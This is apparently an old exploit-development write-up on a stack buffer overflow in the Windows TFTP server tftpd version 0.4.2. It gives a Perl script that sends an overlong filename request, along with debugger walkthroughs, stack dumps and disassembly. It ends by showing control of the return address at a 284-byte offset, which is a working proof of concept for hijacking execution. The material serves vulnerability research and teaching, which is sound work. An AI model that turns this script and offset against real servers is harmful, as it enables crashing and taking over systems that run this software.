Debug in ftpdwin0.4.2
writer: demonalex[at]dark2s[dot]org
I remember had seem some information about overflow ftpdwin(verion
0.4.2),perhaps memory ability was decline,so I wonder
to find which idea can tell me how to overflow that baby...Let's show
my tools:IDA,,,OLLYDB,,,WINDB,,,AND SO ON...
1)First,open IDA to create *.MAP and export.Take OllyDb attach
tftpd.exe,import MAP File to OllyDb, F9 for running...
2)Now we must find length of useless buffer,how??? Write one fuzz
script of perl named
fuzzer.pl,content:
*********************************************************
#!/bin/perl -w
use Net::TFTP;
$|=1;
if(!defined($target_ip=shift)){
die("usage: $0 target_ip\n");
}
##################################
#expcode:
$buffer="\x41"x500; #length of useless buffer
$expcode="$buffer";
##################################
$tftp = Net::TFTP->new("$target_ip", BlockSize => 1024);
$tftp->octet;
$tftp->get("$expcode");
exit 1;
*********************************************************
500 Bytes?Mistaken...EIP is not "\x41"x4...How about 400 Bytes?Of
course is not 400,too.But let us see the content
of stack:
00F5F174 00000000
00F5F178 00406437 ·µ»Øµ½ tftpd.00406437 À´×Ô <jmp.&msvcrt.strcpy>
00F5F17C 00F5F19C
00F5F180 41414141
00F5F184 00000080
00F5F188 00240000
00F5F18C 00000001
Ctrl+G calls goto site to 00406437 and F2 give it a breakpoint in
OllyDB.
3)Open WINDB to Attach tftpd.exe,brute force about eip equal to
0x41414141,the length is 288(includes RET).
4)Change expcode in
fuzzer.pl:
##################################
#expcode:
$buffer="\x41"x284; #length of useless buffer
$ret="\x44\x43\x42\x41";
$expcode="$buffer"."$ret";
##################################
5)In result,Ctrl+F2 into OllyDB for run tftpd.exe again,then play our
new
fuzzer.pl,stop it at our breakpoint(00406437)
,see:
00406437 |. 8D85 D8FDFFFF lea eax, [ebp-228] ;
||
0040643D |. 890424 mov [esp], eax ;
||
00406440 |. E8 DB650100 call <jmp.&msvcrt.strlen> ;
|\strlen
00406445 |. 83F8 03 cmp eax, 3 ;
|
00406448 |. 76 16 jbe short 00406460 ;
|
0040644A |. C74424 04 5D6>mov dword ptr [esp+4], 0042655D ;
|
00406452 |. 8D85 D8FDFFFF lea eax, [ebp-228] ;
|
00406458 |. 890424 mov [esp], eax ;
|
0040645B |. E8 70650100 call <jmp.&msvcrt.strcat> ;
\strcat
00406460 |> 8D85 E8FEFFFF lea eax, [ebp-118] ;
|
00406466 |. 894424 04 mov [esp+4], eax ;
|
0040646A |. 8D85 D8FDFFFF lea eax, [ebp-228] ;
|
00406470 |. 890424 mov [esp], eax ;
|
00406473 |. E8 58650100 call <jmp.&msvcrt.strcat> ;
\strcat
00406478 |> 8B45 10 mov eax, [ebp+10] ;
|
0040647B |. 05 04010000 add eax, 104 ;
|
00406480 |. 894424 0C mov [esp+C], eax ;
|
00406484 |. 8B45 10 mov eax, [ebp+10] ;
|
00406487 |. 894424 08 mov [esp+8], eax ;
|
0040648B |. C74424 04 040>mov dword ptr [esp+4], 104 ;
|
00406493 |. 8D85 D8FDFFFF lea eax, [ebp-228] ;
|
00406499 |. 890424 mov [esp], eax ;
|
0040649C |. E8 7F6C0100 call <jmp.&KERNEL32.GetFullPathNameA> ;
\GetFullPathNameA
004064A1 |. 83EC 10 sub esp, 10
004064A4 |. 85C0 test eax, eax
004064A6 |. 75 0C jnz short 004064B4
004064A8 |. C785 D4FDFFFF>mov dword ptr [ebp-22C], 0
004064B2 |. EB 0A jmp short 004064BE
004064B4 |> C785 D4FDFFFF>mov dword ptr [ebp-22C], 1
004064BE |> 8B85 D4FDFFFF mov eax, [ebp-22C]
004064C4 |. C9 leave
004064C5 \. C3 retn
Press F8 from 00406437 to 004064C5,when come down at 004064C5,you stop
to find content of stack:
00F5F3C8 41424344
00F5F3CC 00428B00 tftpd.00428B00
hey hey ,u did it~